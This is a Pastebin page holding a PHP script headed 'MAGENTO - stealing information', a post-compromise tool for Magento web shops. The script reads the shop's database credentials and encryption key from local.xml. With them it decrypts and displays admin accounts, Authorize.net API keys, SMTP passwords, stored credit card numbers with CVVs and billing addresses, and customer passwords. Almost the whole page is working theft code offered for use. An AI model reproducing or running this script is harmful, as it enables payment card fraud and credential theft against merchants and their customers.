API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Feb 21st, 2017
346
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 15.42 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. /*
  3. coder : sohai
  4. */
  5.  
  6. @set_time_limit(0);
  7.  
  8. echo'<head>
  9. <title>MAGENTO - stealing information</title>
  10. </head>
  11. <div id="page-wrap">
  12. <body>
  13. <style type="text/css">
  14. table { width:100%; border-color:#333333;border-width:0pt 1pt; border-style:solid; }
  15. A:Link, A:Visited { color: #999999; text-decoration: none; }
  16. A.no:Link, A.no:Visited { text-decoration: none; }
  17. A:Hover, A:Visited:Hover , A.no:Hover, A.no:Visited:Hover { color: #666666; background-color:#333333; text-decoration: none; }
  18. input,select,option { font:8pt tahoma;color:#666666;margin:2;border:1px solid #666666; }
  19. textarea { color:#666666;font:verdana bold;border:1px solid ;margin:2; }
  20. .fleft { float:left;text-align:left; }
  21. .fright { float:right;text-align:right; }
  22. #pagebar { font:8pt tahoma;padding:5px; border:3px solid #333333; border-collapse:collapse; }
  23. #pagebar td { vertical-align:top; }
  24. #pagebar p { font:8pt tahoma;}
  25. #pagebar a { font-weight:bold;color:#666666; }
  26. #pagebar a:visited { color:#00CE00; }
  27. #mainmenu { text-align:center; }
  28. #mainmenu a { text-align: center;padding: 0px 5px 0px 5px; }
  29. #maininfo,.barheader,.barheader2 { text-align:center; }
  30. #maininfo td { padding:3px; }
  31. .barheader { font-weight:bold;padding:5px; }
  32. .barheader2 { padding:5px;border:2px solid #333333; }
  33. .contents,.explorer { border-collapse:collapse;}
  34. .contents td { vertical-align:top; }
  35. .mainpanel { border-collapse:collapse;padding:5px; }
  36. .barheader,.mainpanel table,td { border:1px solid #333333; }
  37. .mainpanel input,select,option { border:1px solid #333333;margin:0; }
  38. input[type="submit"] { border:1px solid #333333; }
  39. input[type="text"] { padding:3px;}
  40. .fxerrmsg { color:red; font-weight:bold; }
  41. #pagebar,#pagebar p,h1,h2,h3,h4,form { margin:0; }
  42. #pagebar,.mainpanel,input[type="submit"] { background-color:black; }
  43. .barheader2,input,select,option,input[type="submit"]:hover { background-color:black; }
  44. textarea,.mainpanel input,select,option { background-color:#000000; }
  45. // -->
  46. </style>
  47.  
  48. <body bgcolor="#ffffff" >
  49.  
  50. <center>
  51. <br>
  52. <FORM action="" method="post">
  53. <div align="center">[M A G E N T O] - Stealing Information<br>
  54. <div align="center">coder: sohai & n4KuLa_<br>
  55. <input type="hidden" name="form_action" value="2">
  56. </div>
  57. </div>
  58. ';
  59.  
  60.  
  61. if(file_exists($_SERVER['DOCUMENT_ROOT'].'/app/etc/local.xml')){
  62. $xml = simplexml_load_file($_SERVER['DOCUMENT_ROOT'].'/app/etc/local.xml');
  63. if(isset($xml->global->resources->default_setup->connection)) {
  64. $connection = $xml->global->resources->default_setup->connection;
  65. $prefix = $xml->global->resources->db->table_prefix;
  66. $key = $xml->global->crypt->key; //f8cd1881e3bf20108d5f4947e60acfc1
  67. require_once $_SERVER['DOCUMENT_ROOT'].'/app/Mage.php';
  68.  
  69. try {
  70. $app = Mage::app('default');
  71. Mage::getSingleton('core/session', array('name'=>'frontend'));
  72. }catch(Exception $e) { echo 'Message: ' .$e->getMessage()."<br/>\n";}
  73.  
  74. if (!mysql_connect($connection->host, $connection->username, $connection->password)){
  75. print("Could not connect: " . mysql_error());
  76. }
  77. mysql_select_db($connection->dbname);
  78. echo $connection->host."|".$connection->username."|".$connection->password."|".$connection->dbname."| $prefix | $key<br/>\n";
  79.  
  80. $crypto = new Varien_Crypt_Mcrypt();
  81. $crypto->init($key);
  82.  
  83. //=========================================================================================================
  84. $query = mysql_query("SELECT user_id,firstname,lastname,email,username,password FROM admin_user where is_active = '1'");
  85. if (!$query){
  86. echo "<center><b>Gagal</b></center>";
  87. }else{
  88. $site = mysql_fetch_array(mysql_query("SELECT value as website FROM core_config_data WHERE path='web/unsecure/base_url'"));
  89. echo'<br><br>
  90. ====================================================================<br>
  91. [ Admin FROM website : '.$site['website'].'] <br>
  92. ====================================================================<br>';
  93. }
  94. echo "
  95. <table border='1' align='center' >
  96. <tr>
  97. <td>id</td>
  98. <td>firstname</td>
  99. <td>lastname</td>
  100. <td>email</td>
  101. <td>username</td>
  102. <td>password</td>
  103. </tr>";
  104. while($vx = mysql_fetch_array($query)) {
  105. $no = 1;
  106. $user_id = $vx['user_id'];
  107. $username = $vx['username'];
  108. $password = $vx['password'];
  109. $email = $vx['email'];
  110. $firstname = $vx['firstname'];
  111. $lastname = $vx['lastname'];
  112. echo "<tr><pre><td>$user_id</td><td>$firstname</td><td>$lastname</td><td>$email</td><td>$username</td><td>$password</td></pre></tr>";
  113. }
  114. echo "</table><br>";
  115. //=========================================================================================================
  116. $query = mysql_query("SELECT value as user,(SELECT value FROM core_config_data where path = 'payment/authorizenet/trans_key') as pass FROM core_config_data where path = 'payment/authorizenet/login'");
  117. if(mysql_num_rows($query) != 0){
  118. if (!$query){
  119. echo "<center><b>Gagal</b></center>";
  120. }else{
  121. echo'<br><br>
  122. ====================================================================<br>
  123. [ Authorizenet ] <br>
  124. ====================================================================<br>';
  125. }
  126. echo "
  127. <table border='1' align='center' >
  128. <tr>
  129. <td>no</td>
  130. <td>user</td>
  131. <td>pass</td>
  132. </tr>";
  133. $no = 1;
  134. while($vx = mysql_fetch_array($query)) {
  135. $user = $crypto->decrypt($vx['user']);
  136. $pass = $crypto->decrypt($vx['pass']);
  137.  
  138.  
  139. echo "<tr><pre><td>$no</td><td>$user</td><td>$pass</td></pre></tr>";
  140. $no++;
  141. }
  142. echo "</table><br>";
  143. }
  144. //=========================================================================================================
  145. $query_smtp = mysql_query("SELECT (SELECT a.value FROM core_config_data as a WHERE path = 'system/smtpsettings/host') as host , (SELECT b.value FROM core_config_data as b WHERE path = 'system/smtpsettings/port') as port,(SELECT c.value FROM core_config_data as c WHERE path = 'system/smtpsettings/username') as user ,(SELECT d.value FROM core_config_data as d WHERE path = 'system/smtpsettings/password') as pass FROM core_config_data limit 1,1");
  146. if(mysql_num_rows($query_smtp) != 0){
  147. if (!$query_smtp){
  148. echo "<center><b>Gagal</b></center>";
  149. }else{
  150. echo'<br><br>
  151. ====================================================================<br>
  152. [ SMTP ] <br>
  153. ====================================================================<br>';
  154. }
  155. echo "
  156. <table border='1' align='center' >
  157. <tr>
  158. <td>no</td>
  159. <td>host</td>
  160. <td>port</td>
  161. <td>user</td>
  162. <td>pass</td>
  163. </tr>";
  164. $no = 1;
  165. $batas = 0;
  166. while($rows = mysql_fetch_array($query_smtp)) {
  167. $smtphost = $rows[0];
  168. $smtpport = $rows[1];
  169. $smtpuser = $rows[2];
  170. $smtppass = $rows[3];
  171. echo "<tr><pre><td>$no</td><td>$smtphost</td><td>$smtpport</td><td>$smtpuser</td><td>$smtppass</td></pre></tr>";
  172. $no++;
  173. }
  174. echo "</table><br>";
  175. }
  176. //=========================================================================================================
  177. $query = mysql_query("SELECT sfo.updated_at,sfo.cc_owner,sfo.method,sfo.cc_number_enc,sfo.cc_cid_enc,CONCAT(sfo.cc_exp_month,' |',sfo.cc_exp_year) as exp,CONCAT(billing.firstname,' | ',billing.lastname,' | ',billing.street,' | ',billing.city,' | ', billing.region,' | ',billing.postcode,' | ',billing.country_id,' | ',billing.telephone,' |-| ',billing.email) AS 'Billing Address' FROM sales_flat_quote_payment AS sfo JOIN sales_flat_quote_address AS billing ON billing.quote_id = sfo.quote_id AND billing.address_type = 'billing'");
  178. $query2 = mysql_query("SELECT sfo.cc_owner,sfo.method,sfo.cc_number_enc,sfo.cc_cid_status,CONCAT(sfo.cc_exp_month,'|',sfo.cc_exp_year) as exp,CONCAT(billing.firstname,' | ',billing.lastname,' | ',billing.street,' | ',billing.city,' | ', billing.region,' | ',billing.postcode,' | ',billing.country_id,' | ',billing.telephone,' | ',billing.email) AS 'Billing Address' FROM sales_flat_order_payment AS sfo JOIN sales_flat_order_address AS billing ON billing.parent_id = sfo.parent_id AND billing.address_type = 'billing' where cc_number_enc != ''");
  179. if(mysql_num_rows($query) != 0 || mysql_num_rows($query2) != 0){
  180. echo'<br><br>
  181. ====================================================================<br>
  182. [ Credit Card ] <br>
  183. ====================================================================<br>';
  184. echo "
  185. <table border='1' align='left' >
  186. <tr>
  187. <td>no</td>
  188. <td>Date</td>
  189. <td>Credit Owner</td>
  190. <td>method</td>
  191. <td>Credit Number</td>
  192. <td>Credit Exp</td>
  193. <td>CVV</td>
  194. <td>Address</td>
  195. </tr>";
  196. $no = 1;
  197. $batas = 0;
  198. while($vx = mysql_fetch_array($query)){
  199. $date = $vx['updated_at'];
  200. $cc_owner = $vx['cc_owner'];
  201. $method = $vx['method'];
  202. $cc_number_enc = $crypto->decrypt($vx['cc_number_enc']);
  203. $exp = $vx['exp'];
  204. $cc_cid_enc = $crypto->decrypt($vx['cc_cid_enc']);
  205. $Billing_Address = $vx['Billing Address'];
  206. echo "<tr><pre><td>$no</td><td>$date</td><td>$cc_owner</td><td>$method</td><td>$cc_number_enc</td><td>$exp</td><td>$cc_cid_enc</td><td>$Billing_Address</td></pre></tr>";
  207. $batas = $no++;
  208. }
  209.  
  210. while($vx2 = mysql_fetch_array($query2)){
  211. $batas +=1;
  212. $cc_owner = $vx2['cc_owner'];
  213. $method = $vx2['method'];
  214. $cc_number_enc = $crypto->decrypt($vx2['cc_number_enc']);
  215. $exp = $vx2['exp'];
  216. $cc_cid_status = $crypto->decrypt($vx2['cc_cid_status']);
  217. $Billing_Address = $vx2['Billing Address'];
  218. echo "<tr><pre><td>$batas</td><td>$cc_owner</td><td>$method</td><td>$cc_number_enc</td><td>$exp</td><td>$cc_cid_status</td><td>$Billing_Address</td></pre></tr>";
  219. $batas++;
  220. }
  221.  
  222. echo "</table><br>";
  223. }
  224. //=========================================================================================================
  225. $query = mysql_query("SELECT email,value FROM customer_entity_varchar, customer_entity WHERE customer_entity_varchar.entity_id = customer_entity.entity_id and attribute_id=12");
  226. $query2 = mysql_query("SELECT customer_email,password_hash FROM sales_flat_quote");
  227.  
  228.  
  229. if(mysql_num_rows($query) != 0 || mysql_num_rows($query2) != 0 ){
  230. if (!$query){
  231. echo "<center><b>Gagal</b></center>";
  232. }else{
  233. echo'<br><br>
  234. ====================================================================<br>
  235. [ Customer ] <br>
  236. ====================================================================<br>';
  237. }
  238. echo "
  239. <table border='1' align='center' >
  240. <tr>
  241. <td>no</td>
  242. <td>user</td>
  243. <td>pass</td>
  244. </tr>";
  245. $no = 1;
  246. $batas = 0;
  247. while($vx = mysql_fetch_array($query)) {
  248. $user = $vx['email'];
  249. $pass = $vx['value'];
  250. echo "<tr><pre><td>$no</td><td>$user</td><td>$pass</td></pre></tr>";
  251. $batas = $no++;
  252. }
  253.  
  254. if(mysql_num_rows($query2) != 0 && ($query2)){
  255. while($vx2 = mysql_fetch_array($query2)){
  256. $user = $vx2['customer_email'];
  257. $pass = $crypto->decrypt($vx2['password_hash']);
  258. if(!empty($user) && !empty($pass)){ //tampilin ketika datanya itu ada klo gk ada ya jangan di tampiin
  259. $batas +=1;
  260. echo "<tr><pre><td>$batas</td><td>$user</td><td>$pass</td></pre></tr>";
  261. $batas++;
  262. }
  263. }
  264. }
  265.  
  266. echo "</table><br>";
  267. }
  268. //=========================================================================================================
  269. }
  270. }
  271. function save($format,$data){
  272. $fp = fopen($format, 'a');
  273. fwrite($fp, $data);
  274. fclose($fp);
  275. }
  276. function cekbase64($string){
  277. $decoded = base64_decode($string, true);
  278. if (!preg_match('/^[a-zA-Z0-9\/\r\n+]*={0,2}$/', $string)) return false;
  279. if(!base64_decode($string, true)) return false;
  280. if(base64_encode($decoded) != $string) return false;
  281. return true;//nilai return 1 jika true
  282. }
  283. //----untuk decode password ---/
  284. class Varien_Crypt_Mcrypt{
  285. /**
  286. * Constuctor
  287. *
  288. * @param array $data
  289. */
  290. public function __construct()
  291. {
  292. }
  293.  
  294. /**
  295. * Initialize mcrypt module
  296. *
  297. * @param string $key cipher private key
  298. * @return Varien_Crypt_Mcrypt
  299. */
  300. public function init($key)
  301. {
  302. $this->handler = mcrypt_module_open(MCRYPT_BLOWFISH, '', MCRYPT_MODE_ECB, '');
  303. $iv = mcrypt_create_iv (mcrypt_enc_get_iv_size($this->handler), MCRYPT_RAND);
  304. $maxKeySize = mcrypt_enc_get_key_size($this->handler);
  305.  
  306. if (iconv_strlen($key, 'UTF-8')>$maxKeySize) {
  307. //throw new Varien_Exception('Maximum key size must should be smaller '.$maxKeySize);
  308. return null;
  309. }
  310.  
  311. mcrypt_generic_init($this->handler, $key, $iv);
  312.  
  313. return $this;
  314. }
  315.  
  316. /**
  317. * Encrypt data
  318. *
  319. * @param string $data source string
  320. * @return string
  321. */
  322. public function encrypt($data)
  323. {
  324. if (!$this->handler) {
  325. //throw new Varien_Exception('Crypt module is not initialized.');
  326. return null;
  327. }
  328. if (strlen($data) == 0) {
  329. return $data;
  330. }
  331. return base64_encode(mcrypt_generic($this->handler, $data));
  332. }
  333.  
  334. /**
  335. * Decrypt data
  336. *
  337. * @param string $data encrypted string
  338. * @return string
  339. */
  340. public function decrypt($data)
  341. {
  342. if (!$this->handler) {
  343. //throw new Varien_Exception('Crypt module is not initialized.');
  344. return null;
  345. }
  346. if (strlen($data) == 0) {
  347. return $data;
  348. }
  349. return mdecrypt_generic($this->handler, base64_decode($data));
  350. }
  351.  
  352.  
  353. /**
  354. * Desctruct cipher module
  355. *
  356. */
  357. public function __destruct()
  358. {
  359. if ($this->handler) {
  360. $this->_reset();
  361. }
  362. }
  363.  
  364. protected function _reset()
  365. {
  366. mcrypt_generic_deinit($this->handler);
  367. mcrypt_module_close($this->handler);
  368. }
  369. }
  370.  
  371. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!